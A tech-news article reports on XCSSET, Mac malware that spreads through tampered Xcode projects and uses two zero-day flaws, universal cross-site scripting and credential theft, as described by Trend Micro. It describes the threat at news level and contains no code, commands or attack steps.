New XCSSET Mac spyware exploits Two zero-day vulnerabilities in Mac to steal sensitive data


New XCSSET Mac spyware exploits Two zero-day vulnerabilities in Mac to steal sensitive data

Experts have detected XCSSET a new Mac malware strain that spreads through Xcode projects and exploits two zero-day vulnerabilities to steal sensitive information from target systems and launch ransomware attacks.

An Xcode project is a repository for all the files, resources, and information required to build one or more software products. A project contains all the elements used to build your products and maintains the relationships between those elements. It contains one or more targets, which specify how to build products. A project defines default build settings for all the targets in the project (each target can also specify its own build settings, which override the project build settings).

Out of the two vulnerabilities, the first is used to steal cookies via a flaw in the behavior of Data Vaults, while the second one is used to abuse the development version of Apple made Safari. According to the experts, it was also known the flaw also allows steal data from multiple popular applications which include Evernote, Skype, Notes, QQ, WeChat, and Telegram.

Meanwhile, the malware not only helps attackers to steal the data but also allows them to capture screenshots and exfiltrate stolen documents to the attackers’ server.

“This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that upon the building, these projects would run malicious code.” reported Trend Micro. “This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data were stolen.”

In addition, the malware can also inject a malicious JavaScript code into the browser while visiting specific websites and changing the user’s browser experience. The process is done with the help of universal cross-site scripting (UXSS) attacks and allows the malicious code to replace cryptocurrency addresses, and steal credentials for online services (amoCRM, Apple ID, Google, Paypal, SIPMarket, and Yandex) and payment card information from the Apple Store.

However, it is not yet clear who is operating this malware and how many users have been affected by this. For more news on tech and cybersecurity stay tuned on Android Rookies by subscribing to our newsletter from here.


About Author

Be Ready for the challenge

Notify of
Inline Feedbacks
View all comments